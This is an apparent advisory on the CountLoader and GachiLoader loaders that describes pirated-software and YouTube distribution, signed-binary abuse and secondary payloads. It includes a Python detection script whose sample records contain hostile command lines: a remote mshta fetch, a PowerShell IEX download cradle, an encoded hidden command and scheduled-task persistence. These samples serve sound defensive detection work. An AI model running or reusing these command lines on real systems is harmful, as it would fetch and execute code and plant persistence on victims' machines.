What It Is
CountLoader and GachiLoader are malware loaders, a type of Trojan designed to bring additional malicious code onto a victim's computer. Both are described as fileless and rely on signed-binary abuse, meaning they try to hide their activity by executing through legitimate Windows binaries that already carry a trusted signature. While some operations occur in memory, the loaders still download components and may create persistence mechanisms such as scheduled tasks, so they are not strictly fileless in the purest sense.
Who's Targeted
- Windows endpoints: any PC running a supported version of Microsoft Windows.
- People who download cracked or pirated software. The malicious loaders are often bundled with these illegal copies.
- Viewers of compromised YouTube videos. Certain video pages have been hijacked to serve the payload to anyone who watches them.
How It Works
The infection chain typically starts with a user seeking free, cracked applications. Those downloads are frequently packaged with CountLoader or GachiLoader. When the installer runs, the loader invokes legitimate, signed Windows binaries (for example mshta.exe or PowerShell) to execute code without writing traditional files to disk. This is the signed-binary abuse technique that helps the malware stay under the radar.
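The signed-binary pattern described above is also what a defender looks for in process-creation telemetry. The following Python is an added example, not code from the original article or from any vendor: it runs a handful of behavioural rules over constructed, simplified process-creation records (parent image, image, command line, standing in for Sysmon Event ID 1 / Windows 4688 fields) and flags mshta.exe fetching remote content, PowerShell download cradles or encoded commands, signed binaries launched from user-writable installer locations, and scheduled-task creation whose parent is one of those binaries. Rule names, field names and all sample paths and URLs are assumptions made for the example.

```python
"""Behavioural rules for the signed-binary (LOLBin) abuse pattern described above.

Added example, not the article's or any vendor's code. Event fields are a
simplified stand-in for Sysmon Event ID 1 / Windows 4688 records; the field
names, rule names and sample data below are constructed for illustration.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    rule: str
    event: ProcessEvent


# Signed Microsoft binaries commonly used as execution proxies (assumed list).
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Path fragments typical of a freshly downloaded installer (lower-cased).
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\")

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Common PowerShell download-cradle tokens.
CRADLE_RE = re.compile(r"downloadstring|downloadfile|net\.webclient|"
                       r"invoke-webrequest|\biex\b|invoke-expression|frombase64string",
                       re.IGNORECASE)
# -e / -ec / -enc / -encodedcommand (PowerShell accepts unambiguous prefixes).
ENCODED_RE = re.compile(r"\s-e(?:c|nc|ncoded(?:c(?:ommand)?)?)?\s", re.IGNORECASE)
TASK_CREATE_RE = re.compile(r"\s/create\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcessEvent) -> list[Finding]:
    """Apply every rule to one event; an event may trigger several rules."""
    img, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.command_line
    hits = []
    if img == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_content")
    if img in POWERSHELL:
        if CRADLE_RE.search(cmd):
            hits.append("powershell_download_cradle")
        if ENCODED_RE.search(cmd):
            hits.append("powershell_encoded_command")
    if img in LOLBINS and any(m in ev.parent_image.lower() for m in USER_WRITABLE):
        hits.append("lolbin_from_user_writable_parent")
    if img == "schtasks.exe" and TASK_CREATE_RE.search(cmd) and parent in LOLBINS:
        hits.append("scheduled_task_from_lolbin")
    return [Finding(rule, ev) for rule in hits]


def analyze(events: list[ProcessEvent]) -> list[Finding]:
    return [f for ev in events for f in evaluate(ev)]


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per rule."""
    return dict(Counter(f.rule for f in findings))


# Constructed sample telemetry (paths, URLs and the base64 blob are placeholders).
SUSPICIOUS_EVENTS = [
    ProcessEvent(r"C:\Users\alice\Downloads\Setup_cracked.exe",
                 r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://example.invalid/s.hta"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc QUJDAEQA"),
    ProcessEvent(r"C:\Users\alice\AppData\Local\Temp\crack.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "IEX (New-Object Net.WebClient)'
                 '.DownloadString(\'http://example.invalid/p\')"'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\schtasks.exe",
                 'schtasks.exe /create /tn Updater /tr "C:\\Users\\alice\\AppData\\Roaming\\u.exe" /sc onlogon'),
]
BENIGN_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\schtasks.exe",
                 "schtasks.exe /create /tn Backup /tr backup.exe /sc daily"),
    ProcessEvent(r"C:\Program Files\Vendor\app.exe",
                 r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe C:\Program Files\Vendor\help.hta"),
]

if __name__ == "__main__":
    for finding in analyze(SUSPICIOUS_EVENTS + BENIGN_EVENTS):
        print(f"{finding.rule}: {finding.event.command_line}")
    print(summarize(analyze(SUSPICIOUS_EVENTS)))
```

The rules are deliberately narrow: a signed binary alone is never the signal, the combination of binary, command line and parent is. The benign records (an administrator's script from Explorer, a service creating a task, a vendor application opening a local HTA) produce no findings, while each of the constructed suspicious records trips at least one rule.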
YouTube Distribution
In parallel, malicious actors hijack or take control of YouTube accounts and embed malicious download links in video descriptions or comments. When a viewer clicks the link or a hidden script is triggered, the loader is downloaded and executed using the same signed-binary approach.
What It Does
Once the loader is active on the system, it fetches and installs additional malware. Typical secondary payloads include:
- Infostealers such as Rhadamanthys or ACR Stealer.
- Backdoors and remote-access tools, for example Cobalt Strike or other RATs.
- Other modules chosen by the operator, depending on the campaign's objectives.
The primary goal of a loader is to give the attacker a foothold for further actions such as data theft, credential harvesting, or ransomware deployment.
How To Protect
Because specific mitigation steps are not listed for this threat, the most reliable advice is to consult your security vendor. A professional security service can provide detection signatures, behavioural analytics and remediation guidance tailored to the signed-binary abuse techniques used by CountLoader and GachiLoader.
Conclusion
CountLoader and GachiLoader illustrate how cybercriminals exploit the trust placed in legitimate Windows binaries to slip malicious code onto everyday computers. Their primary victims are users who download cracked software or watch manipulated YouTube videos, a reminder that free or pirated content can carry hidden dangers. While detailed mitigation advice is not provided, reaching out to a trusted security vendor remains the best step to detect and remove these loaders, keeping your Windows system safe from further compromise.